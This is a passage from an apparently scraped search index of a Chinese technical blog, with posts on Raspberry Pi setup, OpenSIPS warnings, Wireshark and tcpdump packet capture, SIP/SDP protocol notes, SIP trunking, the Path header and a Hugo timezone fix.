Wi-fi 然后就很简单了,输入wifi名称和wifi密码,最好你的wifi名称是英文的,出现中文会很尴尬的。 6. 如何找到树莓派的IP地址 某些情况下,树莓派在断电重启之后会获得新的IP地址。在没有显示器的情况下,如果找到树莓派的IP呢?\n树莓派的MAC地址是:b8:27:eb:6c 开头\n所以你只需要输入: arp -a 就会打印网络中的主机以及MAC地址,找以b8:e7:eb:6c开头的,很可能就是树莓派。\n7. 设置清华镜像源 https://mirrors.tuna.tsinghua.edu.cn/help/raspbian/","title":"树莓派初始化配置"},{"content":" 可能和avp_db_query有关 https://opensips.org/pipermail/users/2018-October/040157.html What we found is that the warning go away if we comment out the single avp_db_query that is being used in our config.\n_ The avp_db_query is not executed at the start, but only when specific header is present. Yet the fooding start immediately after opensips start. The mere presence of the avp_db_query function in config without execution is enough to have the issue._\n可能和openssl库有关 https://github.com/OpenSIPS/opensips/issues/1771#issuecomment-517744489 ere are your results. I\u0026rsquo;m attaching the full backtrace (looks about the same) and the logs containing the memory debug. Please let me know if you need additional info.\n这个讨论很有价值 感觉和curl超时有关 https://github.com/OpenSIPS/opensips/issues/929 I checked with a tcpdump, and that http request was answered after 40ms, but opensips missed it. Another strange thing is that despite of the use of async, opensips does not process any other SIP request while waiting for this missing answer, I see because with default params, with 20s timeout, opensips didn\u0026rsquo;t process REGISTER request and SIP endpoints unregistered, this is the reason because I changed connection timeout to 1s.\nI\u0026rsquo;ve discovered that this issue occured only if http keepalive (tcp persistent connection) is enabled. I\u0026rsquo;ve simply added \u0026ldquo;KeepAlive Off\u0026rdquo; directive in httpd configuration and the problem stopped.\nI hope this info will be useful for debugging.\n使用opensipsctl trap 可以产生调用栈文件 WARNING:core:utimer_ticker: utimer task already scheduled for 8723371990 ms (now 8723387850 ms), it may overlap.\n参考资料 https://github.com/OpenSIPS/opensips/issues/1767 https://opensips.org/pipermail/users/2018-October/040151.html https://github.com/OpenSIPS/opensips/issues/2183 https://github.com/OpenSIPS/opensips/issues/1858 https://opensips.org/pipermail/users/2019-August/041454.html https://opensips.org/pipermail/users/2017-October/038209.html ","permalink":"https://wdd.js.org/opensips/ch1/utime-task-scheduled/","summary":"可能和avp_db_query有关 https://opensips.org/pipermail/users/2018-October/040157.html What we found is that the warning go away if we comment out the single avp_db_query that is being used in our config.\n_ The avp_db_query is not executed at the start, but only when specific header is present. Yet the fooding start immediately after opensips start. The mere presence of the avp_db_query function in config without execution is enough to have the issue._\n可能和openssl库有关 https://github.com/OpenSIPS/opensips/issues/1771#issuecomment-517744489 ere are your results.","title":"utimer task \u003ctm-utimer\u003e already scheduled"},{"content":"1. HTTP抓包例子 案例:本地向 http://192.168.40.134:31204/some-api,如何过滤?\nhttp and ip.addr == 192.168.40.134 and tcp.port == 31204 语句分析:\nhttp 表示我只需要http的包 ip.addr 表示只要源ip或者目标ip地址中包含192.168.40.134 tcp.port 表示只要源端口或者目标端口中包含31204 2. 为什么我写的表达式总是不对呢?😂 很多时候,你写的表达式背景色变成红色,说明表达式错误了,例如下图:http and ip.port == 31204\n写出ip.port这个语句,往往是对传输协议理解不清晰。😅\nip是网络层的协议,port是传输层tcp或者udp中使用的。例如你写tcp.port == 80,udp.port ==3000这样是没问题的。但是port不能跟在ip的后面,如果你不清楚怎么写,你可以选择wireshark的智能提示。\n智能提示会提示所有可用的表达式。\n3. 常用过滤表达式 一般我们的过滤都是基于协议,ip地址或者端口号进行过滤的,\n3.1. 基于协议的过滤 直接输入协议名进行过滤\n3.2. 基于IP地址的过滤 3.3. 基于端口的过滤 基于端口的过滤一般就两种\ntcp.port == xxx udp.port == xxx 3.4. 基于host的过滤 4. 比较运算符支持 == 等于 != 不等于 \u0026gt; 大于 \u0026lt; 小于 \u0026gt;= 大于等于 \u0026lt;= 小于等于 ip.addr == 192.168.2.4 5. 逻辑运算符 and 条件与 or 条件或 xor 仅能有一个条件为真 not 所有条件都不能为真 ip.addr == 192.168.2.4 and tcp.port == 2145 and !tcp.port == 3389 6. 只关心某些特殊的tcp包 tcp.flags.fin==1 只过滤关闭连接的包 tcp.flags.syn==1\t只过滤建立连接的包 tcp.flags.reset==1 只过滤出tcp连接重置的包 7. 统计模块 7.1. 查看有哪些IP Statistics -\u0026gt; endpoints\n7.2. 查看那些IP之间发生会话 Statistics -\u0026gt; Conversations\n7.3. 按照协议划分 8. 最后 在会使用上述四个过滤方式之后,就可以自由的扩展了\n🏄🏄🏄🏄🏄🏄 ⛹️‍♀️⛹️‍♀️⛹️‍♀️⛹️‍♀️⛹️‍♀️⛹️‍♀️ 🏋️🏋️🏋️🏋️🏋️🏋️\nhttp.request.method == GET # 基于http请求方式的过滤 ip.src == 192.168.1.4 ","permalink":"https://wdd.js.org/network/wireshark/","summary":"1. HTTP抓包例子 案例:本地向 http://192.168.40.134:31204/some-api,如何过滤?\nhttp and ip.addr == 192.168.40.134 and tcp.port == 31204 语句分析:\nhttp 表示我只需要http的包 ip.addr 表示只要源ip或者目标ip地址中包含192.168.40.134 tcp.port 表示只要源端口或者目标端口中包含31204 2. 为什么我写的表达式总是不对呢?😂 很多时候,你写的表达式背景色变成红色,说明表达式错误了,例如下图:http and ip.port == 31204\n写出ip.port这个语句,往往是对传输协议理解不清晰。😅\nip是网络层的协议,port是传输层tcp或者udp中使用的。例如你写tcp.port == 80,udp.port ==3000这样是没问题的。但是port不能跟在ip的后面,如果你不清楚怎么写,你可以选择wireshark的智能提示。\n智能提示会提示所有可用的表达式。\n3. 常用过滤表达式 一般我们的过滤都是基于协议,ip地址或者端口号进行过滤的,\n3.1. 基于协议的过滤 直接输入协议名进行过滤\n3.2. 基于IP地址的过滤 3.3. 基于端口的过滤 基于端口的过滤一般就两种\ntcp.port == xxx udp.port == xxx 3.4. 基于host的过滤 4. 比较运算符支持 == 等于 != 不等于 \u0026gt; 大于 \u0026lt; 小于 \u0026gt;= 大于等于 \u0026lt;= 小于等于 ip.addr == 192.168.2.4 5. 逻辑运算符 and 条件与 or 条件或 xor 仅能有一个条件为真 not 所有条件都不能为真 ip.","title":"Wireshark抓包教程"},{"content":"查看帮助文档 从帮助文档可以看出,包过滤的表达式一定要放在最后一个参数\ntcpdump [ -AbdDefhHIJKlLnNOpqStuUvxX# ] [ -B buffer_size ] [ -c count ] [ --count ] [ -C file_size ] [ -E spi@ipaddr algo:secret,... ] [ -F file ] [ -G rotate_seconds ] [ -i interface ] [ --immediate-mode ] [ -j tstamp_type ] [ -m module ] [ -M secret ] [ --number ] [ --print ] [ -Q in|out|inout ] [ -r file ] [ -s snaplen ] [ -T type ] [ --version ] [ -V file ] [ -w file ] [ -W filecount ] [ -y datalinktype ] [ -z postrotate-command ] [ -Z user ] [ --time-stamp-precision=tstamp_precision ] [ --micro ] [ --nano ] [ expression ] 列出所有网卡 tcpdump -D 1.enp89s0 [Up, Running, Connected] 2.docker0 [Up, Running, Connected] 3.vetha051ecc [Up, Running, Connected] 4.vethe67e03a [Up, Running, Connected] 5.vethc58c174 [Up, Running, Connected] 指定网卡 -i tcpdump -i eth0 所有网卡 tcpdump -i any 不要域名解析 tcpdump -n -i any 指定主机 tcpdoump host 192.168.0.1 指定源IP或者目标IP # 根据源IP过滤 tcpdump src 192.168.3.2 # 根据目标IP过滤 tcpdump dst 192.168.3.2 指定协议过滤 tcpdump tcp 指定端口 # 根据某个端口过滤 tcpdomp port 33 # 根据源端口或者目标端口过滤 tcpdump dst port 33 tcpdump src port 33 # 根据端口范围过滤 tcpdump portrange 30-90 根据IP和地址 tcpdump -i ens33 tcp and host 192.168.40.30 抓包结果写文件 tcpdump -i ens33 tcp and host 192.168.40.30 -w log.pcap 每隔30秒写一个文件 -G 30 表示每隔30秒写一个文件 文件名中的%实际上是时间格式 tcpdump -i ens33 -G 30 tcp and host 192.168.40.30 -w %Y_%m%d_%H%M_%S.log.pcap 每达到30MB产生一个文件 -C 30 每达到30MB产生一个文件 tcpdump -i ens33 -C 30 tcp and host 192.168.40.30 -w log.pcap 指定抓包的个数 在流量很大的网络上抓包,如果写文件的话,很可能将磁盘写满。所以最好指定一个最大的抓包个数,在达到包的个数后,自动退出。\ntcpdump -c 100000 -i eth0 host 21.23.3.2 -w test.pcap 抓包文件太大,切割成小包 把原来的包文件切割成20M大小的多个包\ntcpdump -r old_file -w new_files -C 20 按照包长大小过滤 # 包长小于某个值 tcpdump less 30 # 包长大于某个值 tcpdump greater 30 按照16进制的方式显示包的内容 BPF 过滤规则 port 53 src port 53 dest port 53 host 1.2.3.4 src host 1.2.3.4 dest host 1.2.3.4 host 1.2.3.4 and port 53 读取old.pcap文件 然后根据条件过滤 产生新的文件 适用于从一个大的pcap文件中过滤出需要的包\ntcpdump -r old.pcap -w new.pcap less 1280 最佳实践 1. 关注 packets dropped by kernel的值 有时候,抓包停止后,tcpdump打印xxx个包drop by kernel。一旦这个值不为零,就要注意了。某些包并不是在网络中丢包了,而是在tcpdump这个工具给丢弃了。\n60 packets captured 279514 packets received by filter 279368 packets dropped by kernel 默认情况下,tcpdump抓包时会做dns解析,这个dns解析会降低tcpdump的处理速度,造成tcpdump的buffer被填满,然后就被tcpdump丢弃。\n我们可以用两个方法解决这个问题\n-B 指定buffer的大小,默认单位为kb。例如-B 1024 -n -nn 设置tcpdump 不要解析host地址,不要抓换协议和端口号 -n Don\u0026#39;t convert host addresses to names. This can be used to avoid DNS lookups. -nn Don\u0026#39;t convert protocol and port numbers etc. to names either. -B buffer_size --buffer-size=buffer_size Set the operating system capture buffer size to buffer_size, in units of KiB (1024 bytes). 参考 https://serverfault.com/questions/131872/how-to-split-a-pcap-file-into-a-set-of-smaller-ones http://alumni.cs.ucr.edu/~marios/ethereal-tcpdump.pdf ethereal-tcpdump.pdf https://unix.stackexchange.com/questions/144794/why-would-the-kernel-drop-packets ","permalink":"https://wdd.js.org/network/tcpdump/","summary":"查看帮助文档 从帮助文档可以看出,包过滤的表达式一定要放在最后一个参数\ntcpdump [ -AbdDefhHIJKlLnNOpqStuUvxX# ] [ -B buffer_size ] [ -c count ] [ --count ] [ -C file_size ] [ -E spi@ipaddr algo:secret,... ] [ -F file ] [ -G rotate_seconds ] [ -i interface ] [ --immediate-mode ] [ -j tstamp_type ] [ -m module ] [ -M secret ] [ --number ] [ --print ] [ -Q in|out|inout ] [ -r file ] [ -s snaplen ] [ -T type ] [ --version ] [ -V file ] [ -w file ] [ -W filecount ] [ -y datalinktype ] [ -z postrotate-command ] [ -Z user ] [ --time-stamp-precision=tstamp_precision ] [ --micro ] [ --nano ] [ expression ] 列出所有网卡 tcpdump -D 1.","title":"Tcpdump抓包教程"},{"content":"git clone https://gitee.com/nuannuande/httpry.git cd httpry yum install libpcap-devel -y make make install cp -f httpry /usr/sbin/ httpry -i eth0 ","permalink":"https://wdd.js.org/network/httpry/","summary":"git clone https://gitee.com/nuannuande/httpry.git cd httpry yum install libpcap-devel -y make make install cp -f httpry /usr/sbin/ httpry -i eth0 ","title":"http抓包工具httpry使用"},{"content":"1. 什么是SDP? SDP是Session Description Protocol的缩写,翻译过来就是会话描述协议,这个协议通常存储各种和媒体相关的信息,例如支持哪些媒体编码, 媒体端口是多少?媒体IP地址是多少之类的。\nSDP一般作为SIP消息的body部分。如下所示\nINVITE sip:bob@biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74bf9 Max-Forwards: 70 From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt; Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Contact: \u0026lt;sip:alice@client.atlanta.example.com;transport=tcp\u0026gt; Content-Type: application/sdp Content-Length: 151 v=0 o=alice 2890844526 2890844526 IN IP4 client.atlanta.example.com s=- c=IN IP4 192.0.2.101 t=0 0 m=audio 49172 RTP/AVP 0 a=rtpmap:0 PCMU/8000 刚开始我一直认为某些sip消息一定带有sdp,例如invite消息。某些sip请求一定没有携带sdp。\n实际上sip消息和sdp并没有硬性的附属关系。sip是用来传输信令的,sdp是用来描述媒体流信息的。\n如果信令不需要携带媒体流信息,就可以不用携带sdp。\n一般情况下,invite请求都会带有sdp信息,但是某些时候也会没有。例如3PCC(third party call control), 第三方呼叫控制,是指由第三方负责协商媒体信息。\n常见的一个场景\n2. SDP字段介绍 2.1. v= 版本号 当前sdp的版本号是0,所以常见的都是v=0\n2.2. o= 发起者id o=的格式\no=username session-id version network-type address-type address username: 登录的用户名或者主机host session-id: NTP时间戳 version: NTP时间戳 network-type: 一般是IN, 表示internet address-type: 表示地址类型,可以是IP4, IP6 2.3. c= 连接数据 c=的格式\nc=network-type address-type connection-address network-type: 一般是IN, 表示internet address-type: 地址类型 IP4, IP6 connection-address: 连接地址 2.4. m= 媒体信息 格式\nm=media port transport format-list media 媒体类型 audio 语音 video 视频 image 传真 port 端口号 transport 传输协议 format-list 格式 m=audio 49430 RTP/AVP 0 6 8 99 m=application 52341 udp wb 2.5. a= 扩展属性 2.6. 通用扩展 3. SDP中的RTP RTCP 信息 RTP的端口一般是偶数,例如下面的4002。RTCP是RTP端口下面的一个奇数,如4003。 RTP中传递的是媒体信息,RTCP是用于控制媒体信息传递的控制信令,流入丢包的数据。\nm=audio 4002 RTP/AVP 104 3 0 8 96 a=rtcp:4003 IN IP4 192.168.1.5 4. WebRTC中的RTP和RTCP端口 在WebRTC中,RTP和RTCP的端口一般是公用一个。 在INIVTE消息的SDP中会带有:\na=rtcp-mux 如果服务端同意公用一个端口,并且INVITE请求成功,那么在200 OK的SDP中可以看到下面的内容。 可以看到RTP和RTCP公用20512端口。\nm=audio 20512 RTP/SAVPF 0 8 101 a=rtcp:20512 a=rtcp-mux 5. 参考 https://www.ietf.org/rfc/rfc2327.txt ","permalink":"https://wdd.js.org/opensips/ch1/sip-with-sdp/","summary":"1. 什么是SDP? SDP是Session Description Protocol的缩写,翻译过来就是会话描述协议,这个协议通常存储各种和媒体相关的信息,例如支持哪些媒体编码, 媒体端口是多少?媒体IP地址是多少之类的。\nSDP一般作为SIP消息的body部分。如下所示\nINVITE sip:bob@biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74bf9 Max-Forwards: 70 From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt; Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Contact: \u0026lt;sip:alice@client.atlanta.example.com;transport=tcp\u0026gt; Content-Type: application/sdp Content-Length: 151 v=0 o=alice 2890844526 2890844526 IN IP4 client.atlanta.example.com s=- c=IN IP4 192.0.2.101 t=0 0 m=audio 49172 RTP/AVP 0 a=rtpmap:0 PCMU/8000 刚开始我一直认为某些sip消息一定带有sdp,例如invite消息。某些sip请求一定没有携带sdp。\n实际上sip消息和sdp并没有硬性的附属关系。sip是用来传输信令的,sdp是用来描述媒体流信息的。\n如果信令不需要携带媒体流信息,就可以不用携带sdp。\n一般情况下,invite请求都会带有sdp信息,但是某些时候也会没有。例如3PCC(third party call control), 第三方呼叫控制,是指由第三方负责协商媒体信息。\n常见的一个场景\n2. SDP字段介绍 2.1. v= 版本号 当前sdp的版本号是0,所以常见的都是v=0\n2.2. o= 发起者id o=的格式","title":"SIP和SDP的关系"},{"content":"1. sip协议由request-uri路由,而不是to字段 sip消息再经过ua发送出去时,request-uri可能会被重写,而to字段,一般是不变的\n2. 主叫生成callId和from tag, 响应to tag由另一方生成 totag的作用可以用来区分初始化请求和序列化请求\n3. sip消息有哪些头字段是必须的? Via Max-Forwards (请求消息必须有这个头,响应消息一般没有这个头) 感谢 @genmzy 提示。 From To Call-ID CSeq 4. 被叫在向主叫发消息时,from和to字段为什么没变? from和to字段用来表名sip 请求的方向,而不是sip消息的方向。主叫发起的请求,那么在这个dialog中,所有的sip消息,主叫和被叫字段都不会变。\n5. 为什么所有via头中的branch都以z9hG4bK开头 这个头是rfc3261中规定的,表示她是经过严格规则生成的,可以用来标记事务。\n6. sip有两种url, 是什么?有什么区别 用户uri: AOR address of record, 例如from和to字段中的url 设备uri: 例如 contact头 用户uri用来唯一认证用户,设备uri用来唯一认证设备。 用户uri往往需要查询数据库,而设备uri来自设备自己的网络地址,不需要查询数据库。 一个用户可能有多个设备 7. sip注册实际上绑定用户url和设备ip地址 我并不能直接联系你,我只能用我的手机拨打你的手机。\n8. 呼叫结束了,为什么呼叫的状态信息还需要维持一段时间? 重传的invite消息,可能包含相同的callI和cseq, 为了影响到之后的呼叫,需要耗尽网络中重传的包。\n9. sip 网关是干什么的? 网关的两侧通信协议是不同的,网关负责将协议翻译成彼此可以理解的协议。sip网关也是如此。电话网络的通信协议不仅仅只有sip, 还有其他的各种信令,如七号信令,ISDN, ISUP, CAS等。\n10. sip结构组件 SIP User Agents Presence Agents B2B User Agents SIp Gateways SIP Server 代理服务器 注册服务器 重定向服务器 11. 代理服务器和UA与网关的区别? 代理服务器没有媒体处理能力 代理服务器不解析消息体,只解析消息头 代理服务器并不分发消息 12. 什么是Forking Proxy? Forking Proxy收到一个INVITE请求,却发出去多个INVITE来呼叫多个UA, 适用于多人会议。 13. SIP url有哪些形式? 下图是 sip url 参数列表: 比较重要的有\nlr ob transport 14. ACK请求的要点知识 只有INVITE需要ACK确认 2xx响应的ACK由主叫方产生 3xx, 4xx,5xx,6xx的ACK是逐跳的,并且一般是代理服务器产生 15. 可靠性的机制 重传 T1 T2 sip如果使用tcp, 那么tcp是自带重传的,不需要sip再做重传机制。如果使用udp, udp本身是没有可靠性的保证的。那么这就需要应用层去自己实现可靠性。\n请求在发送出去时,会启动定时器 重传在达到64T1, 呼叫宣布失败 16. ACK 消息 Cseq method会怎样改变? Cseq不变 method变为ACK 主叫方发送ack, 其中ack的CSeq序号和invite保持一致 17. 端到端的ACK和逐跳的ACK有什么区别 对200响应的ACK是端到端的,对非200的ACK是逐跳的 端到端的ACK是一个新的事务,有新的branchId 逐跳的ACK和上一个INVITE请求的branchId一致 当你收到ACK请求时,你要判断这个ACK是应当立即传递到下一跳,还是自己处理 18. 非INVITE请求的重传 消息发送出去时,启动定时器,周期为T1 如果定时器过期,则再启动定时器,周期为2T1, 周期2倍递增,如果周期到达T2, 则以后的重传周期都是T2 如果中间收到了1xx的消息,则计时器立即将周期设置为T2, 并在T2过期时再次重发 19. INVITE请求的重传 请求以2倍之前的周期执行重传 如果收到1xx的响应,则不会再重传 20. 端到端与逐跳的区别 21. cancel消息的特点 cancel是逐跳的 cancel的CSeq和branchId和上一个invite一致 一般的cancel请求处理图 22. Via的特点 请求在传递给下一站时,UA会在在最上面加上自己的Via头。 branch tag来自 from, to, callId, request-url的hash值 大多数sip头的顺序都是不重要的,但是Via的顺序决定了,响应应该送到哪里 如果请求不是来自Via头 23. 24 CSeq CSeq 会持续增长,有可能不会按1递增 同一个事务的CSeq是相同的 ACK的CSeq会和invite一致 ","permalink":"https://wdd.js.org/opensips/ch1/sip-notes/","summary":"1. sip协议由request-uri路由,而不是to字段 sip消息再经过ua发送出去时,request-uri可能会被重写,而to字段,一般是不变的\n2. 主叫生成callId和from tag, 响应to tag由另一方生成 totag的作用可以用来区分初始化请求和序列化请求\n3. sip消息有哪些头字段是必须的? Via Max-Forwards (请求消息必须有这个头,响应消息一般没有这个头) 感谢 @genmzy 提示。 From To Call-ID CSeq 4. 被叫在向主叫发消息时,from和to字段为什么没变? from和to字段用来表名sip 请求的方向,而不是sip消息的方向。主叫发起的请求,那么在这个dialog中,所有的sip消息,主叫和被叫字段都不会变。\n5. 为什么所有via头中的branch都以z9hG4bK开头 这个头是rfc3261中规定的,表示她是经过严格规则生成的,可以用来标记事务。\n6. sip有两种url, 是什么?有什么区别 用户uri: AOR address of record, 例如from和to字段中的url 设备uri: 例如 contact头 用户uri用来唯一认证用户,设备uri用来唯一认证设备。 用户uri往往需要查询数据库,而设备uri来自设备自己的网络地址,不需要查询数据库。 一个用户可能有多个设备 7. sip注册实际上绑定用户url和设备ip地址 我并不能直接联系你,我只能用我的手机拨打你的手机。\n8. 呼叫结束了,为什么呼叫的状态信息还需要维持一段时间? 重传的invite消息,可能包含相同的callI和cseq, 为了影响到之后的呼叫,需要耗尽网络中重传的包。\n9. sip 网关是干什么的? 网关的两侧通信协议是不同的,网关负责将协议翻译成彼此可以理解的协议。sip网关也是如此。电话网络的通信协议不仅仅只有sip, 还有其他的各种信令,如七号信令,ISDN, ISUP, CAS等。\n10. sip结构组件 SIP User Agents Presence Agents B2B User Agents SIp Gateways SIP Server 代理服务器 注册服务器 重定向服务器 11.","title":"SIP协议拾遗补缺"},{"content":"传统中继 sip trunk中继 安全可靠:SIP Trunk设备和ITSP之间只需建立唯一的、安全的、具有QoS保证的SIP Trunk链路。通过该链路来承载企业的多路并发呼叫,运营商只需对该链路进行鉴权,不再对承载于该链路上的每一路SIP呼叫进行鉴权。 节约硬件成本:企业内部通信由企业IP-PBX负责。企业所有外出通信都通过SIP Trunk交由ITSP,再由ITSP中的设备发送到PSTN网络,企业不再需要维护原有的传统PSTN中继链路,节省了硬件和维护成本。 节约话费成本:企业可以通过设置目的地址任意选择并连接到多个ITSP,充分利用遍布全球各地的ITSP,节省通话费用。 功能强大:部署SIP Trunk设备后,全网可以使用SIP协议,可以更好的支持语音、会议、即时消息等IP通信业务。 处理信令和媒体:SIP Trunk设备不同于SIP代理服务器。SIP Trunk设备接收到用户的呼叫请求后,会代表用户向ITSP发起新呼叫请求。在转发过程中,SIP Trunk设备不但要对信令消息进行中继转发,对RTP媒体消息也需要进行中继转发。在整个过程中,SIP Trunk设备两端的设备(企业内部和企业外部设备)均认为和其交互的是SIP Trunk设备本身。 参考 http://www.h3c.com/cn/d_201009/688762_30003_0.htm https://getvoip.com/blog/2013/01/24/differences-between-sip-trunking-and-hosted-pbx/ https://www.onsip.com/blog/hosted-pbx-vs-sip-trunking https://baike.baidu.com/item/sip%20trunk/1499860 ","permalink":"https://wdd.js.org/opensips/ch1/trunk-pbx-gateway/","summary":"传统中继 sip trunk中继 安全可靠:SIP Trunk设备和ITSP之间只需建立唯一的、安全的、具有QoS保证的SIP Trunk链路。通过该链路来承载企业的多路并发呼叫,运营商只需对该链路进行鉴权,不再对承载于该链路上的每一路SIP呼叫进行鉴权。 节约硬件成本:企业内部通信由企业IP-PBX负责。企业所有外出通信都通过SIP Trunk交由ITSP,再由ITSP中的设备发送到PSTN网络,企业不再需要维护原有的传统PSTN中继链路,节省了硬件和维护成本。 节约话费成本:企业可以通过设置目的地址任意选择并连接到多个ITSP,充分利用遍布全球各地的ITSP,节省通话费用。 功能强大:部署SIP Trunk设备后,全网可以使用SIP协议,可以更好的支持语音、会议、即时消息等IP通信业务。 处理信令和媒体:SIP Trunk设备不同于SIP代理服务器。SIP Trunk设备接收到用户的呼叫请求后,会代表用户向ITSP发起新呼叫请求。在转发过程中,SIP Trunk设备不但要对信令消息进行中继转发,对RTP媒体消息也需要进行中继转发。在整个过程中,SIP Trunk设备两端的设备(企业内部和企业外部设备)均认为和其交互的是SIP Trunk设备本身。 参考 http://www.h3c.com/cn/d_201009/688762_30003_0.htm https://getvoip.com/blog/2013/01/24/differences-between-sip-trunking-and-hosted-pbx/ https://www.onsip.com/blog/hosted-pbx-vs-sip-trunking https://baike.baidu.com/item/sip%20trunk/1499860 ","title":"Trunk Pbx Gateway"},{"content":"RFC3261并没有介绍关于Path头的定义,因为这个头是在RFC3327中定义的,Path头作为一个SIP的扩展头。\nRFC3327的标题是:Session Initiation Protocol (SIP) Extension Header Field for Registering Non-Adjacent Contacts。\n从这个标题可以看出,Path头是作为Register请求的一个消息头,一般这个头只在注册消息上才有。\n这个头的格式如下。\nPath: \u0026lt;sip:P1.EXAMPLEVISITED.COM;lr\u0026gt; 从功能上说,Path头和record-route头的功能非常相似,但是也不同。\n看下面的一个场景,uac通过p1和p2, 将注册请求发送到uas, 在某一时刻,uac作为被叫,INVITE请求要从uas发送到uac, 这时候,INVITE请求应该怎么走?\n假如我们希望INVITE请求要经过p2,p2,然后再发送到uac, Path头的作用就是这个。\n注册请求经过P1时,P1在注册消息上加上p1地址的path头 注册请求经过P2时,P2在注册消息上加上p2地址的path头 注册请求到达uas时,uas从Contact头上获取到uac的地址信息,然后从两个Path头上获取到如下信息:如果要打电话给uac, Path头会转变为route头,用来定义INVITE请求的路径。 简单定义:Path头用来一般在注册消息里,Path头定义了uac作为被叫时,INVITE请求的发送路径。\n参考 ","permalink":"https://wdd.js.org/opensips/ch1/sip-path/","summary":"RFC3261并没有介绍关于Path头的定义,因为这个头是在RFC3327中定义的,Path头作为一个SIP的扩展头。\nRFC3327的标题是:Session Initiation Protocol (SIP) Extension Header Field for Registering Non-Adjacent Contacts。\n从这个标题可以看出,Path头是作为Register请求的一个消息头,一般这个头只在注册消息上才有。\n这个头的格式如下。\nPath: \u0026lt;sip:P1.EXAMPLEVISITED.COM;lr\u0026gt; 从功能上说,Path头和record-route头的功能非常相似,但是也不同。\n看下面的一个场景,uac通过p1和p2, 将注册请求发送到uas, 在某一时刻,uac作为被叫,INVITE请求要从uas发送到uac, 这时候,INVITE请求应该怎么走?\n假如我们希望INVITE请求要经过p2,p2,然后再发送到uac, Path头的作用就是这个。\n注册请求经过P1时,P1在注册消息上加上p1地址的path头 注册请求经过P2时,P2在注册消息上加上p2地址的path头 注册请求到达uas时,uas从Contact头上获取到uac的地址信息,然后从两个Path头上获取到如下信息:如果要打电话给uac, Path头会转变为route头,用来定义INVITE请求的路径。 简单定义:Path头用来一般在注册消息里,Path头定义了uac作为被叫时,INVITE请求的发送路径。\n参考 ","title":"Path头简史"},{"content":"写好了博客,但是没有在网页上渲染出来,岂不是很气人!\n我的archtypes/default.md配置如下\n--- title: \u0026#34;{{ replace .Name \u0026#34;-\u0026#34; \u0026#34; \u0026#34; | title }}\u0026#34; date: \u0026#34;{{ now.Format \u0026#34;2006-01-02 15:04:05\u0026#34; }}\u0026#34; draft: false --- 当使用 hugo new 创建一个文章的时候,有如下的头\n--- title: \u0026#34;01: 学习建议\u0026#34; date: \u0026#34;2022-09-03 10:23:10\u0026#34; draft: false --- Hugo 默认采用的是 格林尼治平时 (GMT),比北京时间 (UTC+8) 晚了 8 个小时,Hugo 在生成静态页面的时候,不会生成超过当前时间的文章。\n如果把北京时间当作格林尼治时间来计算,那么肯定还没有超过当前时间。\n所以我们要给站点设置时区。\n在config.yaml增加如下内容\ntimeZone: \u0026#34;Asia/Shanghai\u0026#34; ","permalink":"https://wdd.js.org/posts/2022/09/hugo-timezone/","summary":"写好了博客,但是没有在网页上渲染出来,岂不是很气人!\n我的archtypes/default.md配置如下\n--- title: \u0026#34;{{ replace .Name \u0026#34;-\u0026#34; \u0026#34; \u0026#34; | title }}\u0026#34; date: \u0026#34;{{ now.Format \u0026#34;2006-01-02 15:04:05\u0026#34; }}\u0026#34; draft: false --- 当使用 hugo new 创建一个文章的时候,有如下的头\n--- title: \u0026#34;01: 学习建议\u0026#34; date: \u0026#34;2022-09-03 10:23:10\u0026#34; draft: false --- Hugo 默认采用的是 格林尼治平时 (GMT),比北京时间 (UTC+8) 晚了 8 个小时,Hugo 在生成静态页面的时候,不会生成超过当前时间的文章。\n如果把北京时间当作格林尼治时间来计算,那么肯定还没有超过当前时间。\n所以我们要给站点设置时区。\n在config.yaml增加如下内容\ntimeZone: \u0026#34;Asia/Shanghai\u0026#34; ","title":"Hugo Timezone没有设置, 导致页面无法渲染"},{"content":" sequenceDiagram title French Words I Know autonumber participant a participant p1 participant p2 participant p3 participant b a-\u003e\u003ep1 : INVITE route: p1, via: a p1-\u003e\u003ep2: INVITE via: a,p1, rr: p1 p2-\u003e\u003ep3: INVITE via: a,p1,p2 rr: p1,p2 p3-\u003e\u003eb: INVITE via: a,p1,p2,p3 rr: p1,p2,p3 b--\u003e\u003ep3: 180 via: a,p1,p2,p3 rr: p1,p2,p3 p3--\u003e\u003ep2: 180 via: a,p1,p2 rr: p1,p2,p3 p2--\u003e\u003ep1: 180 via: a,p1 rr: p1,p2,p3 p1--\u003e\u003ea: 180 via: a rr: p1,p2,p3 b--\u003e\u003ep3: 200 OK via: a,p1,p2,p3 rr: p1,p2,p3 p3--\u003e\u003ep2: 200 Ok via: a,p1,p2 rr: p1,p2,p3 p2--\u003e\u003ep1: 200 Ok via: a,p1 rr: p1,p2,p3 p1--\u003e\u003ea: 200 Ok via: a rr: p1,p2,p3 a-\u003e\u003ep1 : ACK via: a, route: p1,p2,p3 p1-\u003e\u003ep2: ACK via: a,p1, route: p2,p3 p2-\u003e\u003ep3: ACK via: a,p1,p2 route: p3 p3-\u003e\u003eb: ACK via: a,p1,p2,p3 rr代表record-route头。\nTip Via 何时添加: 除了目的地外,请求从ua发出去时 何时删除: 除了目的地外,请求从ua发出去时 作用: 除了目的地外,请求从ua发出去时 Via的作用是让sip消息能够按照原路返回 比喻: 第一次离开家的人,只有每次经过一个地方,就记下地名。那么在回家的时候,他才能按照原来的路径返回。 Tip route 何时添加: 当请求从uac发出去时 何时删除: 请求离开ua时 作用: route的作用是指明下一站的目的地。虽然route请求是在请求发送出去时就添加,但是可以进添加一个。 比喻: 第一次离开家的人,可能并不知道如何到达海南,但是他知道如何到达自己的省会。这个省会就是sip终端配置的外呼代理。每次经过一个站点时,就把这个站点记录到record-route中。record-route会在180或者183,或200ok时,发送给主叫的话机。 Tip record-route 何时添加: 当请求从uas发出去时 何时删除: 为dialog中的后续请求,指明到达目的地的路径 作用: 为dialog中的后续请求,指明到达目的地的路径 比喻: 当一个uac收到180之后,这个180中带有了record-route,例如p1,p2,p3。那么后续的ACK请求,就可以理由record-route来生成route: p1, p2, p3。 Address-of-Record: An address-of-record 